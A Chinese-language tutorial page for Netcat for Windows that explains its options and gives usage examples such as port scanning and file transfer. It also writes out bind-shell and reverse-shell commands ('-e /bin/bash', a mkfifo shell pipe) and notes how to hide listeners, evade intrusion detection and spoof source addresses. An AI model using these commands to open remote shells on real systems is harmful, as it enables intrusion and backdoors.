Netcat for windows V1.11 绿色版

NetCat，简称Nc，是一款非常实用的网络工具，他它能够建立并接受传输控制协议（TCP)和用户数据报协议(UDP)的连接，小巧而功能强大，被誉为网络安全界的“瑞士军刀”。NetCat被设计成一个可靠的后端(back-end) 工具，拥有功能丰富的网络调试和开发工具，它可以通过手工或者脚本与应用层的网络应用程序或服务进行交互，可以帮你轻易的建立几乎任何类型的连接。同时还可以当服务器使用，能监听任意指定端口的连接请求(inbound connection )，并可做同样的读写操作。

Netcat软件特色

*支持连出和连入(outbound and inbound connection)，TCP和UDP，任意源和目的端口

*全部DNS正向/反向检查，给出恰当的警告

*使用任何源端口

*使用任何本地设置的网络资源地址

*内建端口扫描功能，带有随机数发生器

*内建loose source-routing功能

*可能标准输入读取命令行参数

*慢发送模式，每N秒发送一行

*以16进制显示传送或接收的数据

*允许其它程序服务建立连接

*对Telnet应答

Netcat使用说明

nc的命令行介绍

nc的基本命令行形式是 nc [options] host ports，其中host是要扫描的主机名或IP地址，ports要么是一个单独的端口，要么是一个端口范围(用m-n的形式指定)，要么是一系列用空格隔开的单个端口。

-d：只对Windows操作系统有用，该选项使NetCat以隐蔽模式工作，从而脱离MS-DOS命令提示符下环境运行，使得nc不需要保持打开命令窗口便可在监听模式下运行，也可以帮助黑客很好地隐藏监听NetCat实例而不被系统管理员发现。

-e：如果NetCat使用gaping_security_hole选项进行编译，那么只要某人在NET后台所监听的任何端口上建立连接，该NetCat都将 执行,且客户端的NetCat会通过管道将I/O传输到在别处监听的另一个NetCat实例中。使用这个选项非常危险，除非你对nc相当了解，起码知道你 自己在做什么。这是在系统中建立后门shell的一个非常快捷且容易的方法。

-i ：延时间隔，表示在两次数据发送之间nc等待的时间。例如：当经过管道传输一个文件到nc的时候，在传输输入的下一行之前，nc将等待的秒数。当使用nc对 一台主机的多个端口之间进行操作时，在切换到下一个端口之前，nc等待的秒数。这样可以使黑客在进行数据传输或对一个服务进行攻击的时候更加隐蔽，也可以 帮助你的端口扫描不被入侵检测系统和系统管理员发现。

-g：这个选项具有欺骗性。nc支持loose source routing（松散源路由）。你可以在命令行中指定多达8个-g选项来强迫nc流量经过特定的IP地址，这在你为流量设置伪造的源IP地址时，可以利用 这个方法达到通过防火墙的过滤器或者允许访问主机列表，希望接收到从主机返回的响应。

-G：该选项让用户在-g选项所指定的路由列表中指定的一个地址作为当前的下一路由，由于IP地址为4字节大小（IPV4），所以这个参数总是4 字节的倍数；例如，4代表路由表中的第一个IP地址，8代表第二个IP地址，依次类推。这在伪造部分源路由表使得报文看起来相当的有用。在进行欺骗和源路 由时，这个功能有助于屏蔽你的位置，但也不一定能接收到响应报文，因为响应报文将经过由伪造的IP地址反路由回来。

-l：该选项切换nc的监听模式。此选项必须与-p选项一起使用以告诉nc绑定某个指定的TCP端口并等待到来的连接。若换成-u选项，则应使用UDP端口而非TCP端口。

-L：该选项在Windows版本中有用，当一个连接被关闭后，使用相同的命令行选项进行重启监听模式，即使此时初始的连接已经结束，nc也能在不需要用户干涉的情况下接收后面新的连接。与-l一样，必须与-p同时使用。

-n：该选项告诉我们nc不做任何主机名查找的工作。

-0：对数据执行一次十六进制转储（hex dump ）并将其存储在hexfile中。命令nc-o hexfile将把双向通信的数据记录下来，在每行的开始处会有一个“<"或">”用来分别指示是进入数据还是外出数据。如果只想得到对进入 数据的十六进制转储，可以使用 nc -ohexfile命令。

-p：让用户指定一个nc应使用的本地端口号。当通过-l或-L选项来使用监听模式的时候，这个参数是必需的。如果没有为外出连接指定这个参数，则与大多数其他TCP或UDP客户程序的做法一样，nc将使用系统分配给他的任何端口。

-r ：该参数使nc可以随机选择本地和远程端口。当使用nc在系统中范围很大的一批端口上获取信息时，要想混合源端口和目标端口的顺序看起来不怎么象端口扫描， 这个选项是很有用的。当这个选项与-i选项和一个足够大的间隔结合使用的时候，在不被注意的端口扫描成功几率能得到很大提升。

-s：指定nc建立连接时所使用的IP地址，该选项允许黑客做一些工作，它允许黑客隐藏他们的IP地址或假冒他人的IP地址，但是要得到路由到他们所欺骗的地址 的任何信息，都需要使用-g源路由选项。其次，当处于监听模式时，大多数情况下都可以与一个已经监听的服务“预先绑定”，所有TCP和UDP服务都绑定到 某个端口。

-t ：如果使用telnet选项编译，nc就可以与telnet服务器进行telnet选项协商，虽然它的响应是毫无意义的信息，但可以通过该状态看到连接23端口的信息。

-u：nc使用UDP而非TCP，在客户模式和监听模式下都起作用。

-v ：控制nc将要做的事情达到的程度，如使用nc -v，那么nc将仅吐出它所接收到的数据，一个单独的-v可以知道它连接或绑定的地址是否有问题发生，第2个-v可以让nc在一个连接结束的时候让你知道这个连接总共发送和接收了多少数据。

-w：控制在一个连接上nc放弃之前等待的时间。同时也告诉nc当在标准输入上接收到一个eof（end-of-file）之后应该等待多长时间 来关闭连接并退出。如果你通过nc向远程服务器发送命令并且期望大量的数据返回（例如：向一台web服务器发送一个http命令以下载一个大文件），该选 项是很有用的。

使用实例：

1、端口扫描

端口扫描经常被系统管理员和黑客用来发现在一些机器上开放的端口，帮助他们识别系统中的漏洞。

nc -z -v -n 172.31.100.7 21-25

可以运行在TCP或者UDP模式，默认是TCP，-u参数调整为udp.

z 参数告诉netcat使用0 IO,连接成功后立即关闭连接， 不进行数据交换

v 参数指使用冗余选项（译者注：即详细输出）

n 参数告诉netcat 不要使用DNS反向查询IP地址的域名

这个命令会打印21到25 所有开放的端口。Banner是一个文本，Banner是一个你连接的服务发送给你的文本信息。当你试图鉴别漏洞或者服务的类型和版本的时候，Banner信息是非常有用的。但是，并不是所有的服务都会发送banner。

一旦你发现开放的端口，你可以容易的使用netcat 连接服务抓取他们的banner。

nc -v 172.31.100.7 21

netcat 命令会连接开放端口21并且打印运行在这个端口上服务的banner信息。

二、Chat Server

假如你想和你的朋友聊聊，有很多的软件和信息服务可以供你使用。但是，如果你没有这么奢侈的配置，比如你在计算机实验室，所有的对外的连接都是被限制的，你怎样和整天坐在隔壁房间的朋友沟通那？不要郁闷了，netcat提供了这样一种方法，你只需要创建一个Chat服务器，一个预先确定好的端口，这样子他就可以联系到你了。

Server：

nc -l 1567

netcat 命令在1567端口启动了一个tcp 服务器，所有的标准输出和输入会输出到该端口。输出和输入都在此shell中展示。

Client：

nc 172.31.100.7 1567

不管你在机器B上键入什么都会出现在机器A上。

3、文件传输

大部分时间中，我们都在试图通过网络或者其他工具传输文件。有很多种方法，比如FTP,SCP,SMB等等，但是当你只是需要临时或者一次传输文件，真的值得浪费时间来安装配置一个软件到你的机器上嘛。假设，你想要传一个文件file.txt 从A 到B。A或者B都可以作为服务器或者客户端，以下，让A作为服务器，B为客户端。

Server：

nc -l 1567 < file.txt

Client：

nc -n 172.31.100.7 1567 > file.txt

这里我们创建了一个服务器在A上并且重定向netcat的输入为文件file.txt，那么当任何成功连接到该端口，netcat会发送file的文件内容。

在客户端我们重定向输出到file.txt，当B连接到A，A发送文件内容，B保存文件内容到file.txt.没有必要创建文件源作为Server，我们也可以相反的方法使用。像下面的我们发送文件从B到A，但是服务器创建在A上，这次我们仅需要重定向netcat的输出并且重定向B的输入文件。

B作为Server

Server：

nc -l 1567 > file.txt

Client：

nc 172.31.100.23 1567 < file.txt

4、目录传输

发送一个文件很简单，但是如果我们想要发送多个文件，或者整个目录，一样很简单，只需要使用压缩工具tar，压缩后发送压缩包，如果你想要通过网络传输一个目录从A到B。

Server：

tar -cvf – dir_name | nc -l 1567

Client：

nc -n 172.31.100.7 1567 | tar -xvf -

这里在A服务器上，我们创建一个tar归档包并且通过-在控制台重定向它，然后使用管道，重定向给netcat，netcat可以通过网络发送它。在客户端我们下载该压缩包通过netcat 管道然后打开文件。如果想要节省带宽传输压缩包，我们可以使用bzip2或者其他工具压缩。

Server：

tar -cvf – dir_name| bzip2 -z | nc -l 1567

通过bzip2压缩

Client：

nc -n 172.31.100.7 1567 | bzip2 -d |tar -xvf -

使用bzip2解压

5. 加密你通过网络发送的数据如果你担心你在网络上发送数据的安全，你可以在发送你的数据之前用如mcrypt的工具加密。

Server：

nc localhost 1567 | mcrypt –flush –bare -F -q -d -m ecb > file.txt

使用mcrypt工具加密数据。

Client：

mcrypt –flush –bare -F -q -m ecb < file.txt | nc -l 1567

使用mcrypt工具解密数据。

以上两个命令会提示需要密码，确保两端使用相同的密码。这里我们是使用mcrypt用来加密，使用其它任意加密工具都可以。

6、流视频

虽然不是生成流视频的最好方法，但如果服务器上没有特定的工具，使用netcat，我们仍然有希望做成这件事。

Server：

cat video.avi | nc -l 1567

这里我们只是从一个视频文件中读入并重定向输出到netcat客户端

Client：

nc 172.31.100.7 1567 | mplayer -vo x11 -cache 3000 -

这里我们从socket中读入数据并重定向到mplayer。

7、克隆一个设备

如果你已经安装配置一台Linux机器并且需要重复同样的操作对其他的机器，而你不想在重复配置一遍。不在需要重复配置安装的过程，只启动另一台机器的一些引导可以随身碟和克隆你的机器。

克隆Linux PC很简单，假如你的系统在磁盘/dev/sda上

Server：

dd if=/dev/sda | nc -l 1567

Client：

nc -n 172.31.100.7 1567 | dd of=/dev/sda

dd是一个从磁盘读取原始数据的工具，我通过netcat服务器重定向它的输出流到其他机器并且写入到磁盘中，它会随着分区表拷贝所有的信息。但是如果我们已经做过分区并且只需要克隆root分区，我们可以根据我们系统root分区的位置，更改sda 为sda1，sda2.等等。

8、打开一个shell

我们已经用过远程shell-使用telnet和ssh，但是如果这两个命令没有安装并且我们没有权限安装他们，我们也可以使用netcat创建远程shell。假设你的netcat支持 -c -e 参数(默认 netcat)

Server：

nc -l 1567 -e /bin/bash -i

Client：

nc 172.31.100.7 1567

这里我们已经创建了一个netcat服务器并且表示当它连接成功时执行/bin/bash

假如netcat 不支持-c 或者 -e 参数（openbsd netcat）,我们仍然能够创建远程shell

Server：

mkfifo /tmp/tmp_fifo

cat /tmp/tmp_fifo | /bin/sh -i 2>&1 | nc -l 1567 > /tmp/tmp_fifo

这里我们创建了一个fifo文件，然后使用管道命令把这个fifo文件内容定向到shell 2>&1中。是用来重定向标准错误输出和标准输出，然后管道到netcat 运行的端口1567上。至此，我们已经把netcat的输出重定向到fifo文件中。

说明：

从网络收到的输入写到fifo文件中

cat 命令读取fifo文件并且其内容发送给sh命令

sh命令进程受到输入并把它写回到netcat。

netcat 通过网络发送输出到client

至于为什么会成功是因为管道使命令平行执行，fifo文件用来替代正常文件，因为fifo使读取等待而如果是一个普通文件，cat命令会尽快结束并开始读取空文件。在客户端仅仅简单连接到服务器

Client：

nc -n 172.31.100.7 1567

你会得到一个shell提示符在客户端

9、反向shell

反向shell是指在客户端打开的shell。反向shell这样命名是因为不同于其他配置，这里服务器使用的是由客户提供的服务。

Server：

nc -l 1567

在客户端，简单地告诉netcat在连接完成后，执行shell。

Client：

nc 172.31.100.7 1567 -e /bin/bash

现在，什么是反向shell的特别之处呢

反向shell经常被用来绕过防火墙的限制，如阻止入站连接。例如，我有一个专用IP地址为172.31.100.7，我使用代理服务器连接到外部网络。如果我想从网络外部访问 这台机器如1.2.3.4的shell，那么我会用反向外壳用于这一目的。

10、指定源端口

假设你的防火墙过滤除25端口外其它所有端口，你需要使用-p选项指定源端口。

Server：

nc -l 1567

Client：

nc 172.31.100.7 1567 -p 25

使用1024以内的端口需要root权限。该命令将在客户端开启25端口用于通讯，否则将使用随机端口。

11、指定源地址

假设你的机器有多个地址，希望明确指定使用哪个地址用于外部数据通讯。我们可以在netcat中使用-s选项指定ip地址。

Server：

nc -u -l 1567 < file.txt

Client：

nc -u 172.31.100.7 1567 -s 172.31.100.5 > file.txt

该命令将绑定地址172.31.100.5。

12、这仅仅是使用netcat的一些示例。

其它用途有：

使用-t选项模拟Telnet客户端，

HTTP客户端用于下载文件，

连接到邮件服务器，使用SMTP协议检查邮件，

使用ffmpeg截取屏幕并通过流式传输分享等等，其它更多用途。